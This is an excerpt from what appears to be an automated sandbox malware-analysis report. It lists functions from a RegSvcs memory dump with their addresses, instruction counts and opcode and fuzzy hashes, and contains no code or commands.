                                                                                                                              • Instruction ID: 68dd30e494b54051b15c8b3dcfb26f6f48c0b19c0a8fa75a745167b997ae08e5
                                                                                                                              • Opcode Fuzzy Hash: d3659e9974801899d34d844dc87a27c467989828aab4aa109f817c6aba6016f9
                                                                                                                              • Instruction Fuzzy Hash: BB32CD74A00215CFDB25CF68C480BAABBF5FF48704F15856EE955AB3A2D734E842CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01484A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                              • Instruction ID: 3328825e2421c00640b0440f85e01bd943bf0ffec477755248095065d4d41b95
                                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                              • Instruction Fuzzy Hash: BCF16075E0021A9BDB15EF99C580BAEBBF5FF44754F09812EE905AB360E734D842CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F892B Relevance: .4, Instructions: 386COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cc87c9daf7db3f45475fdf64763345ba4d3711db40b7cfa79c0359207cf75f89
                                                                                                                              • Instruction ID: 05657f387e9072d418f712fd3cb461f180c3036c0074d9c5a03500ac2aecd0a4
                                                                                                                              • Opcode Fuzzy Hash: cc87c9daf7db3f45475fdf64763345ba4d3711db40b7cfa79c0359207cf75f89
                                                                                                                              • Instruction Fuzzy Hash: 35D1D071E0060A8BDF15CF69C841BBFB7B1EF88304F19816EDA55AB351E735E9068B60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014665D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c42ca60f7c9334980a4ebecfe9e6c31905679367575bed38d3c25c0e30dfd99
                                                                                                                              • Instruction ID: 1abf3f57a65f3b8e434e46c90c57e7c80abb1da8362bef48510e7140c5c2f51b
                                                                                                                              • Opcode Fuzzy Hash: 6c42ca60f7c9334980a4ebecfe9e6c31905679367575bed38d3c25c0e30dfd99
                                                                                                                              • Instruction Fuzzy Hash: 53E1A571508341CFC715CF28C090A6BBBE5FF99318F05896EE99987361D731E909CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01458397 Relevance: .4, Instructions: 380COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7b85ba7a54726797d30e85c04cd86eeffab42c090d5f053ab81f4b6b92e2d54d
                                                                                                                              • Instruction ID: d68e3a8b5eefad22eef2ebb8db84369653450ec771fd3689eda147c1e6a9514d
                                                                                                                              • Opcode Fuzzy Hash: 7b85ba7a54726797d30e85c04cd86eeffab42c090d5f053ab81f4b6b92e2d54d
                                                                                                                              • Instruction Fuzzy Hash: 31D1E371A00207DBDB54DF6AC890ABB77A5FF64204F04462FED16DB2A2EB30D951CB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction ID: 9c51a561ed1eb3ee1d01704a6180edc30b65150e9a4c2ebb94f856024802890d
                                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction Fuzzy Hash: 47B18574A006069FDF24DF99C948EABBBF9FF94305F14446FAA42977A0DA34E905CB10
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01470535 Relevance: .3, Instructions: 300COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction ID: 8be5c5a69e7db24b8c5dfe4604e9f6443ceb866e84b55cee3247b5dd862920e0
                                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction Fuzzy Hash: 35B127756056469FEB21CB68C960BBFBBF6AF85600F18015AE542DB3A1D730ED41CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014683C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e028c00a81804f02c6d41bdfc4797f172299da9de4e00aae393b185945707bd6
                                                                                                                              • Instruction ID: 988f4d065f37f3d581105d20c37fa2ad5750b0003009abeefc807aef0a53ec3b
                                                                                                                              • Opcode Fuzzy Hash: e028c00a81804f02c6d41bdfc4797f172299da9de4e00aae393b185945707bd6
                                                                                                                              • Instruction Fuzzy Hash: C5C14674108342CFD764CF19C494BABB7E4BF98708F44492EE989873A1E774E909CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f63d973b7154ba74ee190c73cbc465fe48d1f9715d94b8767e65a0d9cf494ce5
                                                                                                                              • Instruction ID: bedc2a8028da5a9266076468c326e78cb8ea19a9c2042408e86b3bb3f5099e56
                                                                                                                              • Opcode Fuzzy Hash: f63d973b7154ba74ee190c73cbc465fe48d1f9715d94b8767e65a0d9cf494ce5
                                                                                                                              • Instruction Fuzzy Hash: C8B19670A002698BDB75CF59C880BA9B3F5EF54704F1485EAD90AEB351DB709D86CB20
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52d278ccdd76786216b6481481c3321e8a12e576ec8679e0d4051ba64e710561
                                                                                                                              • Instruction ID: 8fcb29e4185bef0db7bd8acceb5e17625fdb6f4c83ccb677b8887820f4ae5eb0
                                                                                                                              • Opcode Fuzzy Hash: 52d278ccdd76786216b6481481c3321e8a12e576ec8679e0d4051ba64e710561
                                                                                                                              • Instruction Fuzzy Hash: DFA10635E00655AFEB21EB5CC844BAEBBB5BB00B14F05012BEA11BB3B1D7789D45CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A0185 Relevance: .3, Instructions: 276COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 77d66f7ebaa88d1d0497581e4f4c5c9b7e659043461420a291219c3611a74d3f
                                                                                                                              • Instruction ID: 4c75f95bb86bbf00d29b2a517a0767105d60a40416c882b0a8e2d805a8270590
                                                                                                                              • Opcode Fuzzy Hash: 77d66f7ebaa88d1d0497581e4f4c5c9b7e659043461420a291219c3611a74d3f
                                                                                                                              • Instruction Fuzzy Hash: 9AA1B271B017169BDB25DF69C5A0BAAB7A1FF64314F41402BEA05DB3A2DB34E812CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01534500 Relevance: .3, Instructions: 275COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 579793feb81d2c4740a09d47893dcb4f0a4f5c6b4cd67d827d8997d7c6586b0a
                                                                                                                              • Instruction ID: 7dc4e44b1443b859191fa1415ec16b6b7a2da4b1c047e98bba3c840f4aa23ee9
                                                                                                                              • Opcode Fuzzy Hash: 579793feb81d2c4740a09d47893dcb4f0a4f5c6b4cd67d827d8997d7c6586b0a
                                                                                                                              • Instruction Fuzzy Hash: 78A1CD72A04252DFC722DF28C980B6ABBE9FF98704F45092DE5459F661D334ED01CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01532B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                              • Instruction ID: ac4c74d110c30e5c9e59f75bcddb14e0bafa89919e619aef15286dd7146a90ee
                                                                                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                              • Instruction Fuzzy Hash: FCB11A71E00A1ADFDF19CFADC880AADB7B5FF98310F148569E915AB354D730A941CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 72eb35159e91e4bfad985de986b325fb6457fc1c9a85366e4f8dc617e4f8d11a
                                                                                                                              • Instruction ID: afe0c1f5fcd2fb46c218068e661b29dadb1c6d67e8e638b2d57ede9ee044e72d
                                                                                                                              • Opcode Fuzzy Hash: 72eb35159e91e4bfad985de986b325fb6457fc1c9a85366e4f8dc617e4f8d11a
                                                                                                                              • Instruction Fuzzy Hash: 3691C371D00216AFDF11DF69D888BBEBFF5AF68311F16416AE610AB361D734D9009BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0147E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0215e50a902af8ea898f48bb5bea6ad780df7637f477f954e73b6437e722027f
                                                                                                                              • Instruction ID: 46a1e9ce1683097c968b5cdd3c07e3ed0ecfc39666083077c9520fe4aa255e3e
                                                                                                                              • Opcode Fuzzy Hash: 0215e50a902af8ea898f48bb5bea6ad780df7637f477f954e73b6437e722027f
                                                                                                                              • Instruction Fuzzy Hash: 7E914435A00616DBEB24DB69C440BFA7BA1FF94B14F0542ABE905AB370E734D902C7A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014B6ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d5574ac813991df48158a20d9d38b22995387733dc361a8c8a54402fe56cf3de
                                                                                                                              • Instruction ID: 0acce1b97f25ab470e5213bb424cb07670b0d253d300960fa783a5d7e6d2bd34
                                                                                                                              • Opcode Fuzzy Hash: d5574ac813991df48158a20d9d38b22995387733dc361a8c8a54402fe56cf3de
                                                                                                                              • Instruction Fuzzy Hash: 7981A2B1A0061A9BDB24CF69C980AFEBBF9FB58700F05852FE545D7650E334D941CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0152AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction ID: ef957ddcf87f3b46e03f7f6d733aecc6c40e76bce2cb3faf733e65e698a34a92
                                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction Fuzzy Hash: 3D818232A002169FDF19CF99C480AAEBBF6FF85310F148569E916AF785D734D901CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c8d64f9338f74e4f42f59403d4c8bbfa08790c20fabab3cc3d5d69dbdb65b67b
                                                                                                                              • Instruction ID: c32e4322a17887a06cbf652f1f56cde32ba75d12e4495bdca4f2507be31af18c
                                                                                                                              • Opcode Fuzzy Hash: c8d64f9338f74e4f42f59403d4c8bbfa08790c20fabab3cc3d5d69dbdb65b67b
                                                                                                                              • Instruction Fuzzy Hash: B2817F71A00609AFDF25CFA9C890AEEBBB9FF48314F10442EE555A7260D770AC45CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0147C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b1b9767f89fdb5d80b6ec2072b8437c7f1ce2d3ef71453b05d3dd61561ebe598
                                                                                                                              • Instruction ID: 5ad7dac71bae39713bdeb75ff674f6645207c5356cc6f74c08cf75f2b3bc89f8
                                                                                                                              • Opcode Fuzzy Hash: b1b9767f89fdb5d80b6ec2072b8437c7f1ce2d3ef71453b05d3dd61561ebe598
                                                                                                                              • Instruction Fuzzy Hash: 4E71BD79C006669BCB258F59D8907FEBBB0FF58B10F15412FE956AB360D7309806CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 015147A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3cacc9e75590eeb5968feeae0c489be4a325be0b85c115208fe00e6ded0ad1e2
                                                                                                                              • Instruction ID: 07ea44277e330f6abdd38c7882793d9d8877d7ecf79e279c9588bb491c2dc9dc
                                                                                                                              • Opcode Fuzzy Hash: 3cacc9e75590eeb5968feeae0c489be4a325be0b85c115208fe00e6ded0ad1e2
                                                                                                                              • Instruction Fuzzy Hash: C4718FB1900385EFEB21CF99D950E9EBBFAFB90300F42565AE610AF268C7718944DB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0147260B Relevance: .2, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 16a0ad4f5bd724863e4cdf43990b5a5011dfd0543a3a5d9c9fef768654485611
                                                                                                                              • Instruction ID: 8948901a959585c93bee0d8a306f43d25c95b31da89bfad2a18f4ef3bd9d529b
                                                                                                                              • Opcode Fuzzy Hash: 16a0ad4f5bd724863e4cdf43990b5a5011dfd0543a3a5d9c9fef768654485611
                                                                                                                              • Instruction Fuzzy Hash: 7571CF356046429FD312DF2DC480BABB7E5FF84710F0585ABE8988B362DBB4D846CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E035C Relevance: .2, Instructions: 198COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction ID: 0f1e5b380021ac18ffb6e1b0f7c7f119a922633c78d18bb03241a37cec6a1156
                                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction Fuzzy Hash: F2715F71A00619AFDB10DFAAC944EDEBBF9FF68700F10456AE505E7260DB74EA01CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 00cf9c84cd606dd12bbe1fdffa87a31de0a0c82f1d60ba31e1c84987b1ee7b1c
                                                                                                                              • Instruction ID: 92d9232a3ddc23bcea8c2d059883338820d963f9945a1b2528860a0853499306
                                                                                                                              • Opcode Fuzzy Hash: 00cf9c84cd606dd12bbe1fdffa87a31de0a0c82f1d60ba31e1c84987b1ee7b1c
                                                                                                                              • Instruction Fuzzy Hash: 5F71E032200B01AFE732EF29C844F56BBA6EB50720F16492EE3168B7B0D775E944DB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01538324 Relevance: .2, Instructions: 192COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 26120b1267fe505b04a85dc08a0bfbe718a3b6b1ec2a54047eff224445760f06
                                                                                                                              • Instruction ID: f70d336f8479d7694261aa377a77adf3fb7744d32efedc2d853edef610613624
                                                                                                                              • Opcode Fuzzy Hash: 26120b1267fe505b04a85dc08a0bfbe718a3b6b1ec2a54047eff224445760f06
                                                                                                                              • Instruction Fuzzy Hash: 8971F972E00209BFDB15DF95CC41FEEBBB8FB54350F10461AB615AB290D774AA05CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0151A250 Relevance: .2, Instructions: 184COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 885218c313272e212ea4279b68f3c6fe64578f47f472de2b7a96412ef4e170bb
                                                                                                                              • Instruction ID: fc1e14404d48541bf6fab37129bea993f4e567189a2c4ab03bfb315f4b43b4f0
                                                                                                                              • Opcode Fuzzy Hash: 885218c313272e212ea4279b68f3c6fe64578f47f472de2b7a96412ef4e170bb
                                                                                                                              • Instruction Fuzzy Hash: 0251BF72506652AFE713DE68C844A5BB7E8FBD4750F05092ABA40DF154E7B0ED04C7A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01508350 Relevance: .2, Instructions: 161COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5bd9960377fe0360fdc26a17c491501322fa168c4b136a75f251048eafa372c4
                                                                                                                              • Instruction ID: 0a5fdb7291bfa82e5802dd64991e30a44e8a576bf57ef2a10c11db3e1d14edbc
                                                                                                                              • Opcode Fuzzy Hash: 5bd9960377fe0360fdc26a17c491501322fa168c4b136a75f251048eafa372c4
                                                                                                                              • Instruction Fuzzy Hash: DE518D70900B05DBD722DF9AC880EABFBF8BFA4714F104A1ED2965B6E1C7B0A545CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a263829bc050f33ae0c57adae7854802b1ac64b848e8de0243fca9ede13e6fac
                                                                                                                              • Instruction ID: fe1521ad0b5f78bbccd2bdcc26138fe69c20448347e35292f4f1a95c3b2fc66c
                                                                                                                              • Opcode Fuzzy Hash: a263829bc050f33ae0c57adae7854802b1ac64b848e8de0243fca9ede13e6fac
                                                                                                                              • Instruction Fuzzy Hash: 69518A72200A05DFDB22EFAAC990EAAB7F9FF24654F41042FE50197270E730E941DB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01504180 Relevance: .2, Instructions: 156COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
